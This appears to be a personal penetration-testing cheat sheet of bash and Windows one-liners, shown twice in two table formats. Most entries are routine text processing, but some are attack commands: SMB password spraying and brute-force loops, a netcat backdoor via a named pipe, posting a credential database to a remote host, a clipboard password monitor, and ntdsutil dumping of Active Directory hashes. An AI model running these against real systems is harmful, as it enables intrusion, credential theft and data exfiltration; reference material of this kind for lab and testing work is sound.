One-Liners

Quick fast and speedy

bash
Command
Purpose
GREENIE=haha; export GREENIE
Create an environment var, then export var to be available to other programs
sort | uniq -c | sort -n
Takes stdin, sorts it, finds out the count of each unique value, then sorts  by number
cat squid_access.log | sort -k 2 | head
Using the sort -k parameters sorts on the second colmun of the output
wc -l [lines]
wc -c [bytes]
wc -w [words]
Count lines/bytes/words in a file or from stdin
awk ‘{print $1,$4}’
Print characters 1 and 4 (not zero indexed) from stdin
awk '{print $(NF-1)}'
print the 2nd to last column
awk '{ sum += $1 } END { print sum }'
Takes the lines from a file/stdin and adds up the values, quick and dirty calculator in terminal
cat peptides.txt | while read line; do echo $line; done
read in lines from peptides.txt, then perform echo for each line. Useful to loop through commands for a list of items
cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done
Password spraying using a bash loop
for i in {1..5}; do echo $i; done
Loops from 1 to 5 and echos for each value of i
for i in {000..999}; do echo KEY-HAHA-$i; done
Creates a list of all values from KEY-HAHA-000 to KEY-HAHA-999
sed ‘s/12/13/g’
Replace 12 with 13 found anywhere in stdin, will replace 1234 with 1334
sed -i.bak '/line to delete/d' * 
Delete a line of text for all files in a directory
xxd -p
Print the hex of stdin or a file only, no hexdump format
xxd -r
Interpret raw hex from stdin, can redirect to save the hex to a file
tr -d '\r' | tr -d '\n' | xxd -r -p 
Takes hex input, removes newlines, and places into a file
find / -user Matt 2>/dev/null
Find all files owned by Matt on the box, redirects stderr to null
grep -E "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
grep with regex to match any valid IP address (yes it's ugly)
curl -d “param1=value&param2=value” https://example.com/resource.cgi
Send parameters with curl
date -d @1286536308
convert an epoch timestamp to date output
mknod backpipe p; /bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
Create netcat backdoor without -e support. Generates a named pipe to funnel data
Windows
Command
Purpose
get-childitem -hidden
See all files in current dir
certutil -hashfile ntds.dit md5
Hash a file
certutil -encodehex ntds.dit ntds.hex
Encode a file as hex
certutil -encode test.jpg test.base64
certutil -decode test.base64 test.jpg
Encode and decode a file as base64
@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL
Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB
Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials
Sends the file to a server, catch the file on the other end
iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1
Download a file from another machine
$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }
Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!)
ntdsutil
activate instance ntds
ifm
create full C:\ntds
quit
quit
Use built-in ntdsutil tool to obtain the SYSTEM registry and hive data as a backup, contains user hashes to crack

Hacking Notes

Next - Offensive

Exploit Workflow

Last updated 3 weeks ago

Command	Purpose
`GREENIE=haha; export GREENIE`	Create an environment var, then export var to be available to other programs
`sort \| uniq -c \| sort -n`	Takes `stdin`, sorts it, finds out the count of each unique value, then sorts by number
`cat squid_access.log \| sort -k 2 \| head`	Using the `sort -k` parameters sorts on the second colmun of the output
`wc -l` [lines] `wc -c` [bytes] `wc -w` [words]	Count lines/bytes/words in a file or from `stdin`
`awk ‘{print $1,$4}’`	Print characters 1 and 4 (not zero indexed) from `stdin`
`awk '{print $(NF-1)}'`	print the 2nd to last column
`awk '{ sum += $1 } END { print sum }'`	Takes the lines from a file/`stdin` and adds up the values, quick and dirty calculator in terminal
`cat peptides.txt \| while read line; do echo $line; done`	read in lines from `peptides.txt`, then perform `echo` for each line. Useful to loop through commands for a list of items
`cat users.txt \| while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done`	Password spraying using a `bash` loop
`for i in {1..5}; do echo $i; done`	Loops from 1 to 5 and echos for each value of `i`
`for i in {000..999}; do echo KEY-HAHA-$i; done`	Creates a list of all values from `KEY-HAHA-000` to `KEY-HAHA-999`
`sed ‘s/12/13/g’`	Replace `12` with `13` found anywhere in stdin, will replace `1234` with `1334`
`sed -i.bak '/line to delete/d' *`	Delete a line of text for all files in a directory
`xxd -p`	Print the hex of `stdin` or a file only, no hexdump format
`xxd -r`	Interpret raw hex from `stdin`, can redirect to save the hex to a file
`tr -d '\r' \| tr -d '\n' \| xxd -r -p`	Takes hex input, removes newlines, and places into a file
`find / -user Matt 2>/dev/null`	Find all files owned by `Matt` on the box, redirects `stderr` to null
`grep -E "(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)"`	grep with regex to match any valid IP address (yes it's ugly)
`curl -d “param1=value&param2=value” https://example.com/resource.cgi`	Send parameters with `curl`
`date -d @1286536308`	convert an epoch timestamp to `date` output
`mknod backpipe p; /bin/bash 0<backpipe \| nc -l -p 8080 1>backpipe`	Create netcat backdoor without `-e` support. Generates a named pipe to funnel data

Command	Purpose
`get-childitem -hidden`	See all files in current dir
`certutil -hashfile ntds.dit md5`	Hash a file
`certutil -encodehex ntds.dit ntds.hex`	Encode a file as hex
`certutil -encode test.jpg test.base64` `certutil -decode test.base64 test.jpg`	Encode and decode a file as base64
`@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL`	Dirty looping command to gather a list of users and passwords to bruteforce a server on SMB
`Invoke-RestMethod -Uri http://10.10.14.28:8000/ -Method Post -InFile copy_cert9.db -UseDefaultCredentials`	Sends the file to a server, catch the file on the other end
`iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1`	Download a file from another machine
`$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }`	Powershell - monitors the clipboard and prints to the screen as items are placed on it (passwords!!)
`ntdsutil` `activate instance ntds` `ifm` `create full C:\ntds` `quit` `quit`	Use built-in `ntdsutil` tool to obtain the `SYSTEM` registry and hive data as a backup, contains user hashes to crack